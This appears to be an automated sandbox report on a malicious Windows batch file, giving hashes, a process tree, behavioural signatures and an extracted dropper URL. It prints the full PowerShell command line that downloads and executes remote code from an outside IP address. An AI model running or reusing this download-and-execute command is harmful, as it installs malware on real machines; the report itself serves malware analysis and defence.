Analysis

max time kernel:  147s
max time network: 95s
platform:         windows10_x64
resource:         win10v200722
submitted:        02-08-2020 19:10
Static task: static1

Behavioral task: behavioral1
  Sample:   21b6d26f5616dbe4b9f07bd5660bb62d.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample:   21b6d26f5616dbe4b9f07bd5660bb62d.bat
  Resource: win10v200722 (windows10_x64)
  0 signatures, 0 seconds
General

Target: 21b6d26f5616dbe4b9f07bd5660bb62d.bat
Size:   215B
MD5:    d0dba6d8db0dbf8637507b05349fd02f
SHA1:   e3795cff8728780bd8d72ae5f7e317ee93075e93
SHA256: 085cf732d404c2443d63dd7fef9f872f0c4dc0ef5f0c048bd308a20aff169bd8
SHA512: de33e169bfaf0170acb3053f62d40e115e162671c77555e7c0bae5e12579f7900f1172296279167f120a3821566ee8b111e5e2e366711bf0d5fde9e5e3340b7f
Score:  10/10
Malware Config

Extracted
  Language: ps1
  Source:   ps1.dropper
  URLs:     http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d
Signatures

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description                         pid   process   target process
  PID 4036 wrote to memory of 3900    4036  cmd.exe   powershell.exe
  PID 4036 wrote to memory of 3900    4036  cmd.exe   powershell.exe
  PID 4036 wrote to memory of 3900    4036  cmd.exe   powershell.exe

Program crash (1 IoC)
Processes:
  pid   pid_target   process        target process
  592   3900         WerFault.exe   powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                 pid   process
  Token: SeRestorePrivilege   592   WerFault.exe
  Token: SeBackupPrivilege    592   WerFault.exe
  Token: SeDebugPrivilege     592   WerFault.exe

Suspicious behavior: EnumeratesProcesses (13 IoCs)
Processes:
  pid   process
  592   WerFault.exe   (the same row is reported 13 times)
Processes

C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\21b6d26f5616dbe4b9f07bd5660bb62d.bat"
  PID: 4036
  Signatures: Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d');Invoke-NWPLCMRG;Start-Sleep -s 10000"
    PID: 3900

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 708
      PID: 592
      Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses